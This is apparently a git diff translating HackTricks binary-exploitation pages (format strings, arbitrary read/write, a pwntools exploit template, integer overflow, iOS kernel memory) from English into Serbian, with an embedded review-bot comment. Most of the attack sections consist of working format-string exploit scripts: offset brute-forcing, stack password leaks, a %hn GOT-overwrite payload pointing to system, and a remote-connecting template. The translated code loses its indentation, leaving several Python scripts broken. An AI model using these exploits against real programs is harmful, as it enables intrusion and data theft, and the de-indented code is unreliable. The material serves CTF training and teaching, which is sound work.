- -Notice that the attacker controls the `printf` **parameter, which basically means that** his input is going to be in the stack when `printf` is called, which means that he could write specific memory addresses in the stack. +Obratite pažnju da napadač kontroliše `printf` **parametar, što u suštini znači da** će njegov unos biti u steku kada se pozove `printf`, što znači da bi mogao da upiše specifične adrese u memoriji u stek. > [!CAUTION] -> An attacker controlling this input, will be able to **add arbitrary address in the stack and make `printf` access them**. In the next section it will be explained how to use this behaviour. +> Napadač koji kontroliše ovaj unos, moći će da **doda proizvoljnu adresu u stek i natera `printf` da im pristupi**. U sledećem odeljku biće objašnjeno kako koristiti ovo ponašanje. -## **Arbitrary Read** - -It's possible to use the formatter **`%n$s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with: +## **Proizvoljno Čitanje** +Moguće je koristiti formatirator **`%n$s`** da natera **`printf`** da dobije **adresu** koja se nalazi na **n poziciji**, nakon nje i **odštampa je kao da je string** (štampanje dok se ne pronađe 0x00). Dakle, ako je osnovna adresa binarnog fajla **`0x8048000`**, i znamo da korisnički unos počinje na 4. poziciji u steku, moguće je odštampati početak binarnog fajla sa: ```python from pwn import * 
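Review bot: two `+` lines in this hunk are in Cyrillic script ("и могли бисте читати од првог до четвртог параметра." and "Или бисте могли да урадите:") while every other translated line in the patch is Latin; they should be transliterated ("i mogli biste čitati od prvog do četvrtog parametra.", "Ili biste mogli da uradite:"). Also, "Format **`%$x`**, gde je `n` broj" refers to an `n` that does not appear in the formatter; the `-` line has the same gap, so the placeholder was lost before this patch, but since the line is being rewritten anyway this is the place to restore `%n$x` (the `printf("%4$x")` example a few lines below shows the intended form). Minor: the `fprintf` C block loses its indentation in the `+` lines; C does not care, but the `-` lines show the block was indented and a translation pass should not alter code.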
@@ -106,18 +86,16 @@ payload += p32(0x8048000) #6th param p.sendline(payload) log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||' ``` - > [!CAUTION] -> Note that you cannot put the address 0x8048000 at the beginning of the input because the string will be cat in 0x00 at the end of that address. +> Imajte na umu da ne možete staviti adresu 0x8048000 na početak ulaza jer će string biti prekinut u 0x00 na kraju te adrese. -### Find offset +### Pronađi offset -To find the offset to your input you could send 4 or 8 bytes (`0x41414141`) followed by **`%1$x`** and **increase** the value till retrieve the `A's`. +Da biste pronašli offset za vaš ulaz, možete poslati 4 ili 8 bajtova (`0x41414141`) praćenih **`%1$x`** i **povećavati** vrednost dok ne dobijete `A's`.
Brute Force printf offset - ```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak @@ -125,88 +103,82 @@ from pwn import * # Iterate over a range of integers for i in range(10): - # Construct a payload that includes the current integer as offset - payload = f"AAAA%{i}$x".encode() +# Construct a payload that includes the current integer as offset +payload = f"AAAA%{i}$x".encode() - # Start a new process of the "chall" binary - p = process("./chall") +# Start a new process of the "chall" binary +p = process("./chall") - # Send the payload to the process - p.sendline(payload) +# Send the payload to the process +p.sendline(payload) - # Read and store the output of the process - output = p.clean() +# Read and store the output of the process +output = p.clean() - # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output - if b"41414141" in output: - # If the string is found, log the success message and break out of the loop - log.success(f"User input is at offset : {i}") - break +# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output +if b"41414141" in output: +# If the string is found, log the success message and break out of the loop +log.success(f"User input is at offset : {i}") +break - # Close the process - p.close() +# Close the process +p.close() ``` -
-### How useful +### Koliko je korisno -Arbitrary reads can be useful to: +Arbitrarna čitanja mogu biti korisna za: -- **Dump** the **binary** from memory -- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) +- **Dump** **binarne** datoteke iz memorije +- **Pristup specifičnim delovima memorije gde je smeštena** **osetljiva** **informacija** (kao što su kanari, ključevi za enkripciju ili prilagođene lozinke kao u ovom [**CTF izazovu**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) -## **Arbitrary Write** +## **Arbitrarno Pisanje** -The formatter **`%$n`** **writes** the **number of written bytes** in the **indicated address** in the \ param in the stack. If an attacker can write as many char as he will with printf, he is going to be able to make **`%$n`** write an arbitrary number in an arbitrary address. - -Fortunately, to write the number 9999, it's not needed to add 9999 "A"s to the input, in order to so so it's possible to use the formatter **`%.%$n`** to write the number **``** in the **address pointed by the `num` position**. +Formatirnik **`%$n`** **piše** **broj napisanih bajtova** u **naznačenu adresu** u \ parametru na steku. Ako napadač može da piše onoliko karaktera koliko želi sa printf, moći će da natera **`%$n`** da upiše proizvoljan broj na proizvoljnu adresu. +Srećom, da bi se napisao broj 9999, nije potrebno dodavati 9999 "A" u ulaz, da bi se to postiglo moguće je koristiti formatirnik **`%.%$n`** da bi se napisao broj **``** u **adresu na koju ukazuje `num` pozicija**. 
```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` +Međutim, imajte na umu da se obično za pisanje adrese kao što je `0x08049724` (što je OGROMAN broj za napisati odjednom), **koristi `$hn`** umesto `$n`. To omogućava da **napišete samo 2 bajta**. Stoga se ova operacija vrši dva puta, jednom za najviših 2B adrese i drugi put za najniže. -However, note that usually in order to write an address such as `0x08049724` (which is a HUGE number to write at once), **it's used `$hn`** instead of `$n`. This allows to **only write 2 Bytes**. Therefore this operation is done twice, one for the highest 2B of the address and another time for the lowest ones. +Zbog toga, ova ranjivost omogućava **pisanje bilo čega na bilo kojoj adresi (arbitrarno pisanje).** -Therefore, this vulnerability allows to **write anything in any address (arbitrary write).** - -In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques: +U ovom primeru, cilj će biti da se **prepiše** **adresa** **funkcije** u **GOT** tabeli koja će biti pozvana kasnije. Iako bi ovo moglo zloupotrebiti druge tehnike arbitrarno pisanje za izvršavanje: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} -We are going to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.\ -As mentioned, to write the address, usually 2 steps are needed: You **first writes 2Bytes** of the address and then the other 2. To do so **`$hn`** is used. +Prepisujemo **funkciju** koja **prima** svoje **argumente** od **korisnika** i **upućujemo** je na **`system`** **funkciju**.\ +Kao što je pomenuto, za pisanje adrese obično su potrebna 2 koraka: Prvo **napišete 2B** adrese, a zatim ostale 2. Da biste to uradili, koristi se **`$hn`**. 
-- **HOB** is called to the 2 higher bytes of the address -- **LOB** is called to the 2 lower bytes of the address +- **HOB** se poziva na 2 viša bajta adrese +- **LOB** se poziva na 2 niža bajta adrese -Then, because of how format string works you need to **write first the smallest** of \[HOB, LOB] and then the other one. +Zatim, zbog načina na koji funkcioniše format string, potrebno je **prvo napisati manji** od \[HOB, LOB] i zatim drugi. -If HOB < LOB\ +Ako je HOB < LOB\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` -If HOB > LOB\ +Ako je HOB > LOB\ `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB - ```bash python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"' ``` - ### Pwntools Template -You can find a **template** to prepare a exploit for this kind of vulnerability in: +Možete pronaći **šablon** za pripremu eksploita za ovu vrstu ranjivosti u: {{#ref}} format-strings-template.md {{#endref}} -Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): - +Ili ovaj osnovni primer iz [**ovde**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): ```python from pwn import * 
@@ -225,27 +197,20 @@ p.sendline('/bin/sh') p.interactive() ``` +## Format Strings do BOF -## Format Strings to BOF +Moguće je zloupotrebiti akcije pisanja u ranjivosti format stringa da se **piše u adrese steka** i iskoristi ranjivost tipa **buffer overflow**. -It's possible to abuse the write actions of a format string vulnerability to **write in addresses of the stack** and exploit a **buffer overflow** type of vulnerability. - -## Other Examples & References +## Ostali Primeri i Reference - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string) - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4) - [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak) - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html) - - 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow) +- 32 bita, bez relro, bez kanarija, nx, bez pie, osnovna upotreba format stringova za curenje zastavice iz steka (nije potrebno menjati tok izvršenja) - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) - - 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win) +- 32 bita, relro, bez kanarija, nx, bez pie, format string za prepisivanje adrese `fflush` sa funkcijom win (ret2win) - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) - - 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and 
write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands. - -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} +- 32 bita, relro, bez kanarija, nx, bez pie, format string za pisanje adrese unutar main u `.fini_array` (tako da se tok vraća još jednom) i pisanje adrese u `system` u GOT tabeli koja pokazuje na `strlen`. Kada se tok vrati u main, `strlen` se izvršava sa korisničkim unosom i pokazuje na `system`, izvršiće prosleđene komande. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md index 0665b14a1..cf0c1fda6 100644 --- a/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md +++ b/src/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md @@ -2,31 +2,26 @@ {{#include ../../banners/hacktricks-training.md}} -## Read Binary Start - -### Code +## Čitanje binarnih podataka - Početak +### Kod ```c #include int main(void) { - char buffer[30]; +char buffer[30]; - fgets(buffer, sizeof(buffer), stdin); +fgets(buffer, sizeof(buffer), stdin); - printf(buffer); - return 0; +printf(buffer); +return 0; } ``` - -Compile it with: - +Kompajlirati sa: ```python clang -o fs-read fs-read.c -Wno-format-security -no-pie ``` - -### Exploit - +### Eksploatacija ```python from pwn import * 
@@ -38,16 +33,14 @@ payload += p64(0x00400000) p.sendline(payload) log.info(p.clean()) ``` - -- The **offset is 11** because setting several As and **brute-forcing** with a loop offsets from 0 to 50 found that at offset 11 and with 5 extra chars (pipes `|` in our case), it's possible to control a full address. - - I used **`%11$p`** with padding until I so that the address was all 0x4141414141414141 -- The **format string payload is BEFORE the address** because the **printf stops reading at a null byte**, so if we send the address and then the format string, the printf will never reach the format string as a null byte will be found before -- The address selected is 0x00400000 because it's where the binary starts (no PIE) +- **Offset je 11** jer je postavljanje nekoliko A i **brute-forcing** sa petljom offseta od 0 do 50 pokazalo da je na offsetu 11 i sa 5 dodatnih karaktera (cijevi `|` u našem slučaju) moguće kontrolisati punu adresu. +- Koristio sam **`%11$p`** sa paddingom dok nisam dobio da je adresa sve 0x4141414141414141 +- **Format string payload je PRE adrese** jer **printf prestaje da čita na null bajtu**, tako da ako pošaljemo adresu, a zatim format string, printf nikada neće doći do format stringa jer će null bajt biti pronađen pre +- Odabrana adresa je 0x00400000 jer je to mesto gde binarni fajl počinje (bez PIE)
-## Read passwords - +## Pročitaj lozinke ```c #include #include 
@@ -55,111 +48,103 @@ log.info(p.clean()) char bss_password[20] = "hardcodedPassBSS"; // Password in BSS int main() { - char stack_password[20] = "secretStackPass"; // Password in stack - char input1[20], input2[20]; +char stack_password[20] = "secretStackPass"; // Password in stack +char input1[20], input2[20]; - printf("Enter first password: "); - scanf("%19s", input1); +printf("Enter first password: "); +scanf("%19s", input1); - printf("Enter second password: "); - scanf("%19s", input2); +printf("Enter second password: "); +scanf("%19s", input2); - // Vulnerable printf - printf(input1); - printf("\n"); +// Vulnerable printf +printf(input1); +printf("\n"); - // Check both passwords - if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) { - printf("Access Granted.\n"); - } else { - printf("Access Denied.\n"); - } +// Check both passwords +if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) { +printf("Access Granted.\n"); +} else { +printf("Access Denied.\n"); +} - return 0; +return 0; } ``` - -Compile it with: - +Kompajlirati sa: ```bash clang -o fs-read fs-read.c -Wno-format-security ``` +### Čitanje sa steka -### Read from stack - -The **`stack_password`** will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack: - +**`stack_password`** će biti smešten u stek jer je to lokalna promenljiva, tako da je dovoljno samo zloupotrebiti printf da prikaže sadržaj steka. 
Ovo je eksploatacija za BF prvih 100 pozicija da se otkriju lozinke iz steka: ```python from pwn import * for i in range(100): - print(f"Try: {i}") - payload = f"%{i}$s\na".encode() - p = process("./fs-read") - p.sendline(payload) - output = p.clean() - print(output) - p.close() +print(f"Try: {i}") +payload = f"%{i}$s\na".encode() +p = process("./fs-read") +p.sendline(payload) +output = p.clean() +print(output) +p.close() ``` - -In the image it's possible to see that we can leak the password from the stack in the `10th` position: +Na slici je moguće videti da možemo da iscurimo lozinku iz steka na `10.` poziciji:
-### Read data +### Čitanje podataka -Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%25$p`. Moreover, comparing the leaked address (`0xaaaab7030894`) with the position of the password in memory in that process we can obtain the addresses difference: +Pokretanjem istog eksploita, ali sa `%p` umesto `%s`, moguće je iscuriti adresu iz heap-a iz steka na `%25$p`. Pored toga, upoređujući iscurenu adresu (`0xaaaab7030894`) sa pozicijom lozinke u memoriji u tom procesu, možemo dobiti razliku adresa:
-Now it's time to find how to control 1 address in the stack to access it from the second format string vulnerability: - +Sada je vreme da pronađemo kako da kontrolišemo 1 adresu u steku da bismo joj pristupili iz druge ranjivosti format string-a: ```python from pwn import * def leak_heap(p): - p.sendlineafter(b"first password:", b"%5$p") - p.recvline() - response = p.recvline().strip()[2:] #Remove new line and "0x" prefix - return int(response, 16) +p.sendlineafter(b"first password:", b"%5$p") +p.recvline() +response = p.recvline().strip()[2:] #Remove new line and "0x" prefix +return int(response, 16) for i in range(30): - p = process("./fs-read") +p = process("./fs-read") - heap_leak_addr = leak_heap(p) - print(f"Leaked heap: {hex(heap_leak_addr)}") +heap_leak_addr = leak_heap(p) +print(f"Leaked heap: {hex(heap_leak_addr)}") - password_addr = heap_leak_addr - 0x126a +password_addr = heap_leak_addr - 0x126a - print(f"Try: {i}") - payload = f"%{i}$p|||".encode() - payload += b"AAAAAAAA" +print(f"Try: {i}") +payload = f"%{i}$p|||".encode() +payload += b"AAAAAAAA" - p.sendline(payload) - output = p.clean() - print(output.decode("utf-8")) - p.close() +p.sendline(payload) +output = p.clean() +print(output.decode("utf-8")) +p.close() ``` - -And it's possible to see that in the **try 14** with the used passing we can control an address: +I moguće je videti da u **try 14** sa korišćenim prosleđivanjem možemo kontrolisati adresu:
### Exploit - ```python from pwn import * p = process("./fs-read") def leak_heap(p): - # At offset 25 there is a heap leak - p.sendlineafter(b"first password:", b"%25$p") - p.recvline() - response = p.recvline().strip()[2:] #Remove new line and "0x" prefix - return int(response, 16) +# At offset 25 there is a heap leak +p.sendlineafter(b"first password:", b"%25$p") +p.recvline() +response = p.recvline().strip()[2:] #Remove new line and "0x" prefix +return int(response, 16) heap_leak_addr = leak_heap(p) print(f"Leaked heap: {hex(heap_leak_addr)}") @@ -178,7 +163,6 @@ output = p.clean() print(output) p.close() ``` -
{{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/format-strings/format-strings-template.md b/src/binary-exploitation/format-strings/format-strings-template.md index 71e1d4624..8e2397114 100644 --- a/src/binary-exploitation/format-strings/format-strings-template.md +++ b/src/binary-exploitation/format-strings/format-strings-template.md @@ -1,7 +1,6 @@ -# Format Strings Template +# Шаблон формата стринга {{#include ../../banners/hacktricks-training.md}} - ```python from pwn import * from time import sleep @@ -36,23 +35,23 @@ print(" ====================== ") def connect_binary(): - global P, ELF_LOADED, ROP_LOADED +global P, ELF_LOADED, ROP_LOADED - if LOCAL: - P = process(LOCAL_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +if LOCAL: +P = process(LOCAL_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTETTCP: - P = remote('10.10.10.10',1338) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +elif REMOTETTCP: +P = remote('10.10.10.10',1338) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - P = ssh_shell.process(REMOTE_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(elf)# Find ROP gadgets +elif REMOTESSH: +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +P = ssh_shell.process(REMOTE_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(elf)# Find ROP gadgets ####################################### 
@@ -60,39 +59,39 @@ def connect_binary(): ####################################### def send_payload(payload): - payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD - log.info("payload = %s" % repr(payload)) - if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") - P.sendline(payload) - sleep(0.5) - return P.recv() +payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD +log.info("payload = %s" % repr(payload)) +if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") +P.sendline(payload) +sleep(0.5) +return P.recv() def get_formatstring_config(): - global P +global P - for offset in range(1,1000): - connect_binary() - P.clean() +for offset in range(1,1000): +connect_binary() +P.clean() - payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() +payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() - if b"41" in recieved: - for padlen in range(0,4): - if b"41414141" in recieved: - connect_binary() - payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() - print(recieved) - if b"42424242" in recieved: - log.info(f"Found offset ({offset}) and padlen ({padlen})") - return offset, padlen +if b"41" in recieved: +for padlen in range(0,4): +if b"41414141" in recieved: +connect_binary() +payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() +print(recieved) +if b"42424242" in recieved: +log.info(f"Found offset ({offset}) and padlen ({padlen})") +return offset, padlen - else: - connect_binary() - payload = b" " + payload - recieved = send_payload(payload).strip() +else: +connect_binary() +payload = b" " + payload +recieved = send_payload(payload).strip() # In order to exploit a format string you need to find a position where part of your payload 
@@ -125,10 +124,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}") connect_binary() if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" - sleep(5) +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" +sleep(5) format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) @@ -141,5 +140,4 @@ format_string.execute_writes() P.interactive() ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/integer-overflow.md b/src/binary-exploitation/integer-overflow.md index cf1a6ca4f..5c5bd42b5 100644 --- a/src/binary-exploitation/integer-overflow.md +++ b/src/binary-exploitation/integer-overflow.md 
@@ -2,122 +2,114 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -At the heart of an **integer overflow** is the limitation imposed by the **size** of data types in computer programming and the **interpretation** of the data. +U srži **integer overflow** je ograničenje koje nameće **veličina** tipova podataka u programiranju i **tumačenje** podataka. -For example, an **8-bit unsigned integer** can represent values from **0 to 255**. If you attempt to store the value 256 in an 8-bit unsigned integer, it wraps around to 0 due to the limitation of its storage capacity. Similarly, for a **16-bit unsigned integer**, which can hold values from **0 to 65,535**, adding 1 to 65,535 will wrap the value back to 0. +Na primer, **8-bitni bez znak** može predstavljati vrednosti od **0 do 255**. Ako pokušate da sačuvate vrednost 256 u 8-bitnom bez znaka, ona se vraća na 0 zbog ograničenja svoje kapaciteta skladištenja. Slično tome, za **16-bitni bez znak**, koji može da drži vrednosti od **0 do 65,535**, dodavanje 1 na 65,535 će vratiti vrednost nazad na 0. -Moreover, an **8-bit signed integer** can represent values from **-128 to 127**. This is because one bit is used to represent the sign (positive or negative), leaving 7 bits to represent the magnitude. The most negative number is represented as **-128** (binary `10000000`), and the most positive number is **127** (binary `01111111`). +Štaviše, **8-bitni sa znakom** može predstavljati vrednosti od **-128 do 127**. To je zato što se jedan bit koristi za predstavljanje znaka (pozitivan ili negativan), ostavljajući 7 bita za predstavljanje magnitude. Najnegativniji broj se predstavlja kao **-128** (binarno `10000000`), a najpozitivniji broj je **127** (binarno `01111111`). 
-### Max values +### Maksimalne vrednosti -For potential **web vulnerabilities** it's very interesting to know the maximum supported values: +Za potencijalne **web ranjivosti** veoma je zanimljivo znati maksimalne podržane vrednosti: {{#tabs}} {{#tab name="Rust"}} - ```rust fn main() { - let mut quantity = 2147483647; +let mut quantity = 2147483647; - let (mul_result, _) = i32::overflowing_mul(32767, quantity); - let (add_result, _) = i32::overflowing_add(1, quantity); +let (mul_result, _) = i32::overflowing_mul(32767, quantity); +let (add_result, _) = i32::overflowing_add(1, quantity); - println!("{}", mul_result); - println!("{}", add_result); +println!("{}", mul_result); +println!("{}", add_result); } ``` - {{#endtab}} {{#tab name="C"}} - ```c #include #include int main() { - int a = INT_MAX; - int b = 0; - int c = 0; +int a = INT_MAX; +int b = 0; +int c = 0; - b = a * 100; - c = a + 1; +b = a * 100; +c = a + 1; - printf("%d\n", INT_MAX); - printf("%d\n", b); - printf("%d\n", c); - return 0; +printf("%d\n", INT_MAX); +printf("%d\n", b); +printf("%d\n", c); +return 0; } ``` - {{#endtab}} {{#endtabs}} -## Examples +## Primeri -### Pure overflow - -The printed result will be 0 as we overflowed the char: +### Čista preliv +Ispisani rezultat će biti 0 jer smo preli u char: ```c #include int main() { - unsigned char max = 255; // 8-bit unsigned integer - unsigned char result = max + 1; - printf("Result: %d\n", result); // Expected to overflow - return 0; +unsigned char max = 255; // 8-bit unsigned integer +unsigned char result = max + 1; +printf("Result: %d\n", result); // Expected to overflow +return 0; } ``` +### Konverzija sa potpisanog na nepotpisani -### Signed to Unsigned Conversion - -Consider a situation where a signed integer is read from user input and then used in a context that treats it as an unsigned integer, without proper validation: - +Razmotrite situaciju u kojoj se potpisani ceo broj čita iz korisničkog unosa i zatim se koristi u kontekstu koji ga 
tretira kao nepotpisani ceo broj, bez pravilne validacije: ```c #include int main() { - int userInput; // Signed integer - printf("Enter a number: "); - scanf("%d", &userInput); +int userInput; // Signed integer +printf("Enter a number: "); +scanf("%d", &userInput); - // Treating the signed input as unsigned without validation - unsigned int processedInput = (unsigned int)userInput; +// Treating the signed input as unsigned without validation +unsigned int processedInput = (unsigned int)userInput; - // A condition that might not work as intended if userInput is negative - if (processedInput > 1000) { - printf("Processed Input is large: %u\n", processedInput); - } else { - printf("Processed Input is within range: %u\n", processedInput); - } +// A condition that might not work as intended if userInput is negative +if (processedInput > 1000) { +printf("Processed Input is large: %u\n", processedInput); +} else { +printf("Processed Input is within range: %u\n", processedInput); +} - return 0; +return 0; } ``` +U ovom primeru, ako korisnik unese negativan broj, biće interpretiran kao veliki nesigned integer zbog načina na koji se binarne vrednosti interpretiraju, što može dovesti do neočekivanog ponašanja. -In this example, if a user inputs a negative number, it will be interpreted as a large unsigned integer due to the way binary values are interpreted, potentially leading to unexpected behavior. - -### Other Examples +### Ostali primeri - [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html) - - Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection +- Samo 1B se koristi za čuvanje veličine lozinke, tako da je moguće prepuniti je i naterati je da misli da je dužina 4, dok je zapravo 260, kako bi se zaobišla zaštita provere dužine. 
- [https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/puzzle/index.html) - - Given a couple of numbers find out using z3 a new number that multiplied by the first one will give the second one: +- Dati nekoliko brojeva, otkrijte koristeći z3 novi broj koji pomnožen sa prvim će dati drugi: - ``` - (((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569) - ``` +``` +(((argv[1] * 0x1064deadbeef4601) & 0xffffffffffffffff) == 0xD1038D2E07B42569) +``` - [https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/) - - Only 1B is used to store the size of the password so it's possible to overflow it and make it think it's length of 4 while it actually is 260 to bypass the length check protection and overwrite in the stack the next local variable and bypass both protections +- Samo 1B se koristi za čuvanje veličine lozinke, tako da je moguće prepuniti je i naterati je da misli da je dužina 4, dok je zapravo 260, kako bi se zaobišla zaštita provere dužine i prepisala sledeća lokalna promenljiva na steku i zaobišla obe zaštite. ## ARM64 -This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/). +Ovo **se ne menja u ARM64** kao što možete videti u [**ovom blog postu**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/). {{#include ../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/ios-exploiting.md b/src/binary-exploitation/ios-exploiting.md index dbf5dc009..e52942665 100644 --- a/src/binary-exploitation/ios-exploiting.md +++ b/src/binary-exploitation/ios-exploiting.md 
@@ -1,212 +1,203 @@ # iOS Exploiting -## Physical use-after-free +## Fizičko korišćenje nakon oslobađanja -This is a summary from the post from [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html) moreover further information about exploit using this technique can be found in [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd) +Ovo je sažetak iz posta sa [https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html), a dodatne informacije o eksploatu korišćenjem ove tehnike mogu se naći na [https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd) -### Memory management in XNU +### Upravljanje memorijom u XNU -The **virtual memory address space** for user processes on iOS spans from **0x0 to 0x8000000000**. However, these addresses don’t directly map to physical memory. Instead, the **kernel** uses **page tables** to translate virtual addresses into actual **physical addresses**. +**Virtuelni adresni prostor** za korisničke procese na iOS-u se proteže od **0x0 do 0x8000000000**. Međutim, ove adrese se ne mapiraju direktno na fizičku memoriju. Umesto toga, **kernel** koristi **tabele stranica** za prevođenje virtuelnih adresa u stvarne **fizičke adrese**. -#### Levels of Page Tables in iOS +#### Nivoi tabela stranica u iOS-u -Page tables are organized hierarchically in three levels: +Tabele stranica su organizovane hijerarhijski u tri nivoa: -1. **L1 Page Table (Level 1)**: - * Each entry here represents a large range of virtual memory. - * It covers **0x1000000000 bytes** (or **256 GB**) of virtual memory. -2. **L2 Page Table (Level 2)**: - * An entry here represents a smaller region of virtual memory, specifically **0x2000000 bytes** (32 MB). - * An L1 entry may point to an L2 table if it can't map the entire region itself. -3. **L3 Page Table (Level 3)**: - * This is the finest level, where each entry maps a single **4 KB** memory page. 
